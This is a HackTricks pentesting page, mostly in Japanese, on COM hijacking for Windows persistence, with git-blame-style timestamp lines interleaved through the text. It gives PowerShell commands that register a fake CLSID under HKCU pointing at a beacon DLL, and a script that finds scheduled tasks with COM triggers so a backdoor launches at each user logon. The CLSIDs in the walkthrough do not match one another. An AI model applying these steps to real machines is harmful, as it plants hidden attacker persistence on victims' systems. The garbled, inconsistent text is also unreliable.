2024-01-09 15:31:32 +00:00
# COM Hijacking
2022-08-12 23:51:41 +00:00
< details >
2024-02-08 03:59:37 +00:00
< summary > < strong > ゼロからヒーローまでAWSハッキングを学ぶ< / strong > < a href = "https://training.hacktricks.xyz/courses/arte" > < strong > htARTE( HackTricks AWS Red Team Expert) < / strong > < / a > < strong > ! < / strong > < / summary >
2022-08-12 23:51:41 +00:00
2024-02-08 03:59:37 +00:00
HackTricks をサポートする他の方法:
2022-08-12 23:51:41 +00:00
2024-02-08 03:59:37 +00:00
* **HackTricks で企業を宣伝したい** または **HackTricks をPDFでダウンロードしたい** 場合は [**SUBSCRIPTION PLANS** ](https://github.com/sponsors/carlospolop ) をチェックしてください!
* [**公式PEASS& HackTricksスワッグ** ](https://peass.creator-spring.com )を入手する
* [**The PEASS Family** ](https://opensea.io/collection/the-peass-family )、当社の独占的な [**NFTs** ](https://opensea.io/collection/the-peass-family ) コレクションを発見する
2024-02-09 01:39:37 +00:00
* **💬 [Discordグループ ](https://discord.gg/hRep4RUj7f )** に参加するか、[telegramグループ](https://t.me/peass) に参加するか、**Twitter** 🐦 [**@carlospolopm** ](https://twitter.com/hacktricks_live ) をフォローする。
* **ハッキングトリックを共有するには、PRを** [**HackTricks** ](https://github.com/carlospolop/hacktricks ) **および** [**HackTricks Cloud** ](https://github.com/carlospolop/hacktricks-cloud ) **のGitHubリポジトリに提出してください。**
2022-08-12 23:51:41 +00:00
< / details >
2024-02-09 01:39:37 +00:00
### 存在しないCOMコンポーネントの検索
2022-08-12 23:51:41 +00:00
2024-02-09 01:39:37 +00:00
HKCUの値はユーザーによって変更される可能性があるため、**COM Hijacking** は **永続的なメカニズム** として使用できます。`procmon` を使用すると、存在しない検索されたCOMレジストリを見つけることが簡単で、攻撃者が永続化するために作成できるものです。フィルター:
2022-08-12 23:51:41 +00:00
2024-01-09 15:31:32 +00:00
* **RegOpenKey** 操作。
2024-02-08 03:59:37 +00:00
* _Result_ が **NAME NOT FOUND** である場所。
2024-02-09 01:39:37 +00:00
* および _Path_ が **InprocServer32** で終わる場合。
2022-08-12 23:51:41 +00:00
2024-02-09 01:39:37 +00:00
存在しないCOMを偽装することを決定したら、次のコマンドを実行してください。_数秒ごとにロードされるCOMを偽装することを決定した場合は注意してください。_  
2022-08-12 23:51:41 +00:00
```bash
New-Item -Path "HKCU:Software\Classes\CLSID" -Name "{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}"
New-Item -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" -Name "InprocServer32" -Value "C:\beacon.dll"
New-ItemProperty -Path "HKCU:Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\InprocServer32" -Name "ThreadingModel" -Value "Both"
```
2024-02-08 03:59:37 +00:00
### Hijackable Task Scheduler COM components
2022-08-12 23:51:41 +00:00
2024-02-08 03:59:37 +00:00
Windows Tasks use Custom Triggers to call COM objects and because they're executed through the Task Scheduler, it's easier to predict when they're gonna be triggered.
2022-08-12 23:51:41 +00:00
2024-02-08 03:59:37 +00:00
< pre class = "language-powershell" > < code class = "lang-powershell" > # COM CLSIDの表示
2022-08-12 23:51:41 +00:00
$Tasks = Get-ScheduledTask
foreach ($Task in $Tasks)
{
2023-07-07 23:42:27 +00:00
if ($Task.Actions.ClassId -ne $null)
{
if ($Task.Triggers.Enabled -eq $true)
{
$usersSid = "S-1-5-32-545"
$usersGroup = Get-LocalGroup | Where-Object { $_.SID -eq $usersSid }
if ($Task.Principal.GroupId -eq $usersGroup)
{
2024-02-08 03:59:37 +00:00
Write-Host "Task Name: " $Task.TaskName
Write-Host "Task Path: " $Task.TaskPath
2023-07-07 23:42:27 +00:00
Write-Host "CLSID: " $Task.Actions.ClassId
Write-Host
}
}
}
2022-08-12 23:51:41 +00:00
}
2023-07-07 23:42:27 +00:00
# サンプル出力:
2024-02-08 03:59:37 +00:00
< strong > # Task Name: Example
</ strong > # Task Path: \Microsoft\Windows\Example\
2022-08-12 23:51:41 +00:00
# CLSID: {1936ED8A-BD93-3213-E325-F38D112938E1}
2024-02-08 03:59:37 +00:00
# [前のものと同様の出力...]</code></pre>
2022-08-12 23:51:41 +00:00
2024-02-08 03:59:37 +00:00
Checking the output you can select one that is going to be executed **every time a user logs in** for example.
2022-08-12 23:51:41 +00:00
2024-02-08 03:59:37 +00:00
Now searching for the CLSID ** {1936ED8A-BD93-3213-E325-F38D112938EF}** in **HKEY\_**_**CLASSES\_**_**ROOT\CLSID** and in HKLM and HKCU, you usually will find that the value doesn't exist in HKCU.
2022-08-12 23:51:41 +00:00
```bash
# Exists in HKCR\CLSID\
Get-ChildItem -Path "Registry::HKCR\CLSID\{1936ED8A-BD93-3213-E325-F38D112938EF}"
Name Property
---- --------
InprocServer32 (default) : C:\Windows\system32\some.dll
2023-07-07 23:42:27 +00:00
ThreadingModel : Both
2022-08-12 23:51:41 +00:00
# Exists in HKLM
Get-Item -Path "HKLM:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}" | ft -AutoSize
Name Property
---- --------
{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1} (default) : MsCtfMonitor task handler
# Doesn't exist in HKCU
PS C:\> Get-Item -Path "HKCU:Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}"
Get-Item : Cannot find path 'HKCU:\Software\Classes\CLSID\{01575CFE-9A55-4003-A5E1-F38D1EBDCBE1}' because it does not exist.
```
2024-02-09 01:39:37 +00:00
その後、HKCUエントリを作成するだけで、ユーザーがログインするたびにあなたのバックドアが起動します。